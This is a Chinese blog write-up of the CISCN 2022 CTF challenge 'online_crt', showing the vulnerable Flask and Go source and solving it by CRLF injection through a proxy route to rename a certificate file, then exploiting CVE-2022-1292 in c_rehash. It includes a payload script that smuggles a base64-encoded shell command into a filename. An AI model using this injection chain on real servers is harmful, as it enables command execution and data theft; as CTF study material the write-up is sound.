[CISCN 2022 初赛]online_crt

最新推荐文章于 2022-11-17 20:57:08 发布
最新推荐文章于 2022-11-17 20:57:08 发布
阅读量766 收藏 2
点赞数 2
分类专栏: ctf刷题记录 文章标签: flask python 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62078839/article/details/125144431
版权

下载附件,查看app.py

import datetime
import json
import os
import socket
import uuid
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.x509.oid import NameOID
from flask import Flask
from flask import render_template
from flask import request

app = Flask(__name__)

app.config['SECRET_KEY'] = os.urandom(16)

def get_crt(Country, Province, City, OrganizationalName, CommonName, EmailAddress):
    root_key = rsa.generate_private_key(
        public_exponent=65537,
        key_size=2048,
        backend=default_backend()
    )
    subject = issuer = x509.Name([
        x509.NameAttribute(NameOID.COUNTRY_NAME, Country),
        x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, Province),
        x509.NameAttribute(NameOID.LOCALITY_NAME, City),
        x509.NameAttribute(NameOID.ORGANIZATION_NAME, OrganizationalName),
        x509.NameAttribute(NameOID.COMMON_NAME, CommonName),
        x509.NameAttribute(NameOID.EMAIL_ADDRESS, EmailAddress),
    ])
    root_cert = x509.CertificateBuilder().subject_name(
        subject
    ).issuer_name(
        issuer
    ).public_key(
        root_key.public_key()
    ).serial_number(
        x509.random_serial_number()
    ).not_valid_before(
        datetime.datetime.utcnow()
    ).not_valid_after(
        datetime.datetime.utcnow() + datetime.timedelta(days=3650)
    ).sign(root_key, hashes.SHA256(), default_backend())
    crt_name = "static/crt/" + str(uuid.uuid4()) + ".crt"
    with open(crt_name, "wb") as f:
        f.write(root_cert.public_bytes(serialization.Encoding.PEM))
    return crt_name


@app.route('/', methods=['GET', 'POST'])
def index():
    return render_template("index.html")


@app.route('/getcrt', methods=['GET', 'POST'])
def upload():
    Country = request.form.get("Country", "CN")
    Province = request.form.get("Province", "a")
    City = request.form.get("City", "a")
    OrganizationalName = request.form.get("OrganizationalName", "a")
    CommonName = request.form.get("CommonName", "a")
    EmailAddress = request.form.get("EmailAddress", "a")
    return get_crt(Country, Province, City, OrganizationalName, CommonName, EmailAddress)


@app.route('/createlink', methods=['GET'])
def info():
    json_data = {"info": os.popen("c_rehash static/crt/ && ls static/crt/").read()}
    return json.dumps(json_data)


@app.route('/proxy', methods=['GET'])
def proxy():
    uri = request.form.get("uri", "/")
    client = socket.socket()
    client.connect(('localhost', 8887))
    msg = f'''GET {uri} HTTP/1.1
Host: test_api_host
User-Agent: Guest
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

'''
    client.send(msg.encode())
    data = client.recv(2048)
    client.close()
    return data.decode()

app.run(host="0.0.0.0", port=8888)

getcrt是生成证书的,createlink调用popen运行了c_rehash

c_rehash 存在漏洞  CVE-2022-1292

是当用户可控文件名时的命令注入

再看到/proxy路由由用户构造报文,看看go 服务源码

package main

import (
	"github.com/gin-gonic/gin"
	"os"
	"strings"
)

func admin(c *gin.Context) {
	staticPath := "/app/static/crt/"
	oldname := c.DefaultQuery("oldname", "")
	newname := c.DefaultQuery("newname", "")
	if oldname == "" || newname == "" || strings.Contains(oldname, "..") || strings.Contains(newname, "..") {
		c.String(500, "error")
		return
	}
	if c.Request.URL.RawPath != "" && c.Request.Host == "admin" {
		err := os.Rename(staticPath+oldname, staticPath+newname)
		if err != nil {
			return
		}
		c.String(200, newname)
		return
	}
	c.String(200, "no")
}

func index(c *gin.Context) {
	c.String(200, "hello world")
}

func main() {
	router := gin.Default()
	router.GET("/", index)
	router.GET("/admin/rename", admin)

	if err := router.Run(":8887"); err != nil {
		panic(err)
	}
}

可以通过 /proxy 来更改文件名为命令
最后通过 /createlink 调用 c_rehash 执行命令


 得到一个证书

利用脚本修改

import urllib.parse
uri = '''/admin%2frename?oldname=7ec49aae-99df-427f-8f73-fc12504b0ff6.crt&newname=`echo%20Y2F0IC8qIA==|base64%20--decode|bash>flag.txt`.crt HTTP/1.1
Host: admin
Content-Length: 136
Connection: close

'''
gopher = uri.replace("\n","\r\n")
aaa = urllib.parse.quote(gopher)
print(aaa)

/admin%252frename%3Foldname%3D7ec49aae-99df-427f-8f73-fc12504b0ff6.crt%26newname%3D%60echo%2520Y2F0IC8qIA%3D%3D%7Cbase64%2520--decode%7Cbash%3Eflag.txt%60.crt%20HTTP/1.1%0D%0AHost%3A%20admin%0D%0AContent-Length%3A%20136%0D%0AConnection%3A%20close%0D%0A%0D%0A

 

还要在表单中添加

Content-Type: application/x-www-form-urlencoded

 利用/createlink调用c_rehash

 访问路由

 

 得到flag

H3018-R
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTF_OnlineTools:存储库为CTF索引有用的在线工具
05-07
CTF在线工具 可以对有趣的在线工具建立索引的存储库。 平台类 维基 网页 https://beautifier.io/ http://jsonviewer.stack.hu/ https://pentest-tools.com/ https://tableconvert.com/ https://www.rdtoc.com/tools/jmespath https://www.rdtoc.com/tools/jsonpath 倒车 https://onlinedisassembler.com/ http://www.javadecompilers.com/ https://www.hybrid-analysis.com/ https://any.run/ 密码学 https://gchq.github.io/Cyber​​Chef/ https://www.dco
2022 ciscn初赛 online_crt
l11III1111的博客
05-30 562
online_crt 题目给出附件先看app.py 给出了3个路由/getcrt是生成证书的路径暂时没看出有啥,然后就是createlink调用popen运行了c_rehash,看了一下是perl脚本,上网搜一下发现CVE-2022-1292,没有exp但是漏洞描述是当用户可控文件名时的命令注入,所以现在目标为控制文件名 再看到/proxy路由由用户构造报文,可以crlf,附件中还给了goserver看看源码 可以看到/admin/rename可以控制文件名称Request.URL.RawPath需要我
[2022CISCN]online_crt(ssrf+OpenSSL)CVE-2022-1292
Landasika的博客
06-01 7523
修改main.go 将 改成 运行main.go python环境 修改app.py 因为大多数c_rehash指代的不是题目给的这个包,而是其他程序卸载环境变量里面的c_rehash,如下图所以我们打开把这个 改成 移动c_rehash 将goland_server里面的c_rehash移动到上一级目录,也就是和app.py一级 题解 分析 首先,题目是python+go /getcrt 是生成了一个SSL证书利用x509编码/createlink调用c_rehash修改文件名创建SSL证书链接/pox
2022CISCN初赛 WP
Lum1n0us's Blog
05-29 1194
文章目录Crypto签到电台 Crypto 签到电台 在公众号找到提示 在“标准电码表”找“弼时安全到达了”所对应的7个电码,再跟“密码本”的前7*4个数字分别逐位进行“模十算法”(加不进位、减不借位),所得到的就是要发送的电码。 发送电码前先发送“s”启动,即按3个“.”,这个发送电报的过程可以使用抓包软件进行抓取,可方便输入电报。 “弼时安全到达了”所对应的7个电码: 1732 2514 1344 0356 0451 6671 0055 模十算法示例:1732与6378得到7000 发包示例:/sen
NOIP提高组初赛复习3_栈.pdf
08-26
NOIP提高组初赛复习3_栈 栈是计算机科学中一种特殊的线性表,限定只能在表尾进行插入、删除操作的线性表。栈的特点是后进先出(LIFO,Last In First Out),即最后入栈的元素最先出栈。栈顶(top)是允许插入和删除...
2008_初赛_答案_C++.pdf
最新发布
05-08
2008_初赛_答案_C++.pdf
2008_初赛_试题_C++.pdf
05-08
2008_初赛_试题_C++.pdf
电赛初赛_1294_
10-02
利用德州仪器公司的1294芯片实现实现呼吸灯
CISCN 2020 线上初赛 z3 WP
h1nt的博客
08-21 1180
IDA打开后核心代码如下: int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [rsp+20h] [rbp-60h] int v5; // [rsp+24h] [rbp-5Ch] int v6; // [rsp+28h] [rbp-58h] int v7; // [rsp+2Ch] [rbp-54h] int v8; // [rsp+30h] [rbp-50h] int v9;
【阿尼亚不会CTF】第十五届CISCN创新实践能力赛—线上初赛部分writeup
qq_45943172的博客
05-30 1077
目录 ez_usb 基于挑战码的双向认证、基于挑战码的双向认证2: 基于挑战码的双向认证3 ISO9798 ez_usb 题目描述: 简单的流量。 解题思路: 下载附件,解压得到一个流量包,如题,是USB流量分析。 观察发现主要有2.4.1、2.8.1、2.10.1三个Source的键盘输入,分别进行筛选并导出; 然后利用kali自带的tshark工具提取对应的内容; tshark -T json -r 241.pcapng > 241.json tshark -T.
第15届全国大学生知识竞赛场景实操 2022ciscn线上初赛 部分writeup
Nancy523的博客
05-29 2698
文章目录ez_usbeverlasting_night问卷调查签到电台Ezpop**基于挑战码的双向认证1、2**基于挑战码的双向认证3Iso9798Login-nomalBaby-tree ez_usb 拿到附件wireshark打开 观察 发现流量中存在两种arr 过滤 usb.addr == “2.8.1” && usbhid.data跟usb.addr == “2.10.1” && usbhid.data 分别导出为csv文件 提取hid data 梭哈脚本,
CISCN 2022 初赛 web 复现
shinygod的博客
11-17 1668
比赛复现
[CISCN 2022 初赛]ezpentest
v2ish1yan的博客
07-25 1126
sql注入:盲注、`utf8mb4_bin`字符集的利用、`case when then else end` 的使用 php混淆解密:phpjiami混淆 php反序列化:原生类、`spl_autoload_register`函数、GC垃圾回收机制的利用
CTF 在线工具
多喝i热水的博客
09-06 1438
1.http://ctf.ssleye.com/ 2.https://tool.bugku.com/ 3.https://www.bejson.com/ 4.https://tool.lu/coderunner/ 5.https://www.sojson.com/encrypt.html 6.http://www.ctftools.com/
CISCN2022全国初赛题解WriteUp-MapleLeaves
Do1phln的博客
06-04 2844
Do1phln b477ery sfc9982 0HBthinkphp 6.0.12lts 存在反序列化漏洞 https://www.freebuf.com/vuls/321546.html 扫描可知 www.zip 存在源码泄露,下载后可知存在反序列化路由 online_crt c_rehash 存在漏洞 https://www.secrss.com/articles/42602 CVE-2022-1292 先通过 /getcrt 获取文件名 再通过 /proxy 访问 go 服务更改文件名为命令 最
CTF常用在线工具总结
weixin_30443747的博客
12-12 279
在线工具 MD5加密 MD5解密(推荐) MD5解密(推荐) MD5解密 escap加解密 维吉尼亚密码 SHA 对称加密AES DES\3DES RC4\Rabbit Quoted-printable 栅栏密码 希尔密码 猪圈密码 培根密码(方式1) rot13\18解码 rot13\18编码 凯撒密码 颜色查询...
crt上传数据_攻击者利用通达OA漏洞释放勒索病毒,用户数据遭到加密
weixin_35952362的博客
12-30 275
近日,通达OA官方论坛发布了一则安全更新,披露了近期出现攻击者利用通达OA文件上传和文件包含漏洞释放勒索病毒的攻击事件,攻击者通过漏洞上传webshell伪装OA插件的下载提示页面,诱导用户点击下载运行勒索病毒,官方紧急发布了各版本的安全加固补丁。漏洞名称:通达OA文件上传和文件包含漏洞可致远程代码执行威胁等级:高危影响范围:通达OA V11版通达OA 2017版通达OA 2016版通...
[ciscn 2019 初赛]love math
03-16
好的,以下是回复: 这道题目需要我们求出一个数列中所有数的最大公约数。我们可以使用欧几里得算法来求解。具体来说,我们可以用辗转相除的方法,不断将两个数中较大的数除以较小的数,直到两个数相等为止,此时的数即为它们的最大公约数。我们可以用一个循环来实现这个过程,不断更新两个数的值,直到它们相等为止。最后得到的数即为所求的最大公约数。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值